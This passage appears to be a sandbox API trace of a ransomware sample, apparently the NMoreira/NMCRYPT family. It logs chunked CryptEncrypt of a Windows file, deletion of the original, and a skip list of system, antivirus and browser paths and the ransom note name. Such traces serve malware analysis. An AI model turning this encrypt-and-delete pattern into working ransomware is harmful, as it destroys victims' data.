pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.204] GetLastError () returned 0x0 [0157.205] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.205] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.205] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.205] GetLastError () returned 0x0 [0157.205] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.205] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.205] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.205] GetLastError () returned 0x0 [0157.205] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.205] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.205] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.205] GetLastError () returned 0x0 [0157.205] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.205] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.205] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.205] GetLastError () returned 0x0 [0157.205] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.206] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.206] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.206] GetLastError () returned 0x0 [0157.206] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.206] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.206] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.206] GetLastError () returned 0x0 [0157.206] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.206] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.206] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.206] GetLastError () returned 0x0 [0157.206] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.206] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.206] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.206] GetLastError () returned 0x0 [0157.206] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.206] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.206] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.206] GetLastError () returned 0x0 [0157.206] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.207] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.207] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.207] GetLastError () returned 0x0 [0157.207] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.207] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.207] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.207] GetLastError () returned 0x0 [0157.207] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.207] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.207] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.207] GetLastError () returned 0x0 [0157.207] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.207] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x3b, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x3b, lpOverlapped=0x0) returned 1 [0157.207] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x3b, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x40) returned 1 [0157.207] GetLastError () returned 0x0 [0157.207] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x40, lpOverlapped=0x0) returned 1 [0157.207] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0157.207] WriteFile (in: hFile=0x588, lpBuffer=0x607e18*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0157.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml")) returned 0x20 [0157.208] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", dwFileAttributes=0x20) returned 0 [0157.208] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 1 [0157.208] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml")) returned 0 [0157.208] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" [0157.208] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 1 [0157.208] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD955.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd955.tmp")) returned 0xd955 [0157.209] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD955.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd955.tmp"), dwFlags=0x1) returned 0 [0157.209] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD955.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd955.tmp")) returned 1 [0157.210] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0157.210] wcslen (_String="OK") returned 0x2 [0157.210] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.210] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.210] CryptDestroyKey (hKey=0x9ad278) returned 1 [0157.210] CryptDestroyHash (hHash=0x9ad238) returned 1 [0157.210] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0157.210] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*NMCRYPT") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*Recovers your files.html") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*.exe") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*.dll") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*.lnk") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*.bat") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*.ini") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*.msi") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*.scf") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*pagefile.sys*") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*NTUSER.DAT*") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*AppData*") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*\\winrar\\*") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*\\java\\*") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*\\windows\\*") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*\\ESET\\*") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*\\AVG\\*") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*\\AVIRA\\*") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*Atheros*") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*Realtek*") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*bootmgr*") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*boot*") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*boot*") returned 0 [0157.210] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*CONFIG.SYS*") returned 0 [0157.211] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*IO.SYS*") returned 0 [0157.211] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*MSDOS.SYS*") returned 0 [0157.211] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*NTDETECT.COM*") returned 0 [0157.211] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*ntldr*") returned 0 [0157.211] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*chrome*") returned 0 [0157.211] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*opera*") returned 0 [0157.211] PathMatchSpecW (pszFile="zh-phonetic.xml", pszSpec="*firefox*") returned 0 [0157.211] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", pszSpec="*") returned 1 [0157.211] strlen (_Str="NMoreira") returned 0x8 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) 